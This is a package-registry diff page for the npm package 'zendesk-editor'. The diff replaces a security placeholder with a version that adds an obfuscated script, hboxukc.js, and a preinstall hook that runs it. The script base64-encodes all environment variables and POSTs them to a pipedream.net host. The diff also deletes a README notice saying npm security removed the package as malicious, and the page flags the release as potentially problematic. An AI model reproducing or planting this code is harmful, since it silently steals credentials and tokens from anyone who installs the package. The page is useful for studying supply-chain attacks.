zendesk-editor 0.0.1-security → 1.878.347
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zendesk-editor might be problematic. Click here for more details.
- package/hboxukc.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/hboxukc.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x5bd7(_0x3c1f07,_0x5c0498){const _0x357497=a0_0x3574();return a0_0x5bd7=function(_0x5bd7f9,_0x471470){_0x5bd7f9=_0x5bd7f9-0xf1;let _0x4cc7ed=_0x357497[_0x5bd7f9];return _0x4cc7ed;},a0_0x5bd7(_0x3c1f07,_0x5c0498);}const a0_0xd05002=a0_0x5bd7;function a0_0x3574(){const _0x453218=['2175708vhKPBA','1970358IYEDYt','8csyzNZ','70CPVnXU','net','591119sPvqQD','1381622hNApsG','https','811430kwBaMK','end','env','1799031wwsUyv','POST','2kkmhNZ','from','join','1929546gYdXza','base64','7WAHeKW'];a0_0x3574=function(){return _0x453218;};return a0_0x3574();}(function(_0x3efec2,_0x57b07e){const _0x3a2272=a0_0x5bd7,_0x273b66=_0x3efec2();while(!![]){try{const _0xf8f3ea=parseInt(_0x3a2272(0xfb))/0x1*(parseInt(_0x3a2272(0x103))/0x2)+-parseInt(_0x3a2272(0x101))/0x3+parseInt(_0x3a2272(0xf6))/0x4+-parseInt(_0x3a2272(0xfe))/0x5+parseInt(_0x3a2272(0xf7))/0x6*(-parseInt(_0x3a2272(0xf5))/0x7)+parseInt(_0x3a2272(0xf8))/0x8*(-parseInt(_0x3a2272(0xf3))/0x9)+-parseInt(_0x3a2272(0xf9))/0xa*(-parseInt(_0x3a2272(0xfc))/0xb);if(_0xf8f3ea===_0x57b07e)break;else _0x273b66['push'](_0x273b66['shift']());}catch(_0x1678f8){_0x273b66['push'](_0x273b66['shift']());}}}(a0_0x3574,0xad386));const http=require(a0_0xd05002(0xfd));req=http['request']({'host':['4aaa0dfa016c3686a57e93787657fa37','m','pipedream',a0_0xd05002(0xfa)][a0_0xd05002(0xf2)]('.'),'path':'/'+(process[a0_0xd05002(0x100)]['npm_package_name']||''),'method':a0_0xd05002(0x102)}),req['write'](Buffer[a0_0xd05002(0xf1)](JSON['stringify'](process[a0_0xd05002(0x100)]))['toString'](a0_0xd05002(0xf4))),req[a0_0xd05002(0xff)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zendesk-editor",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "1.878.347",
|
|
4
|
+
"main": "hboxukc.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node hboxukc.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zendesk-editor for more information.
|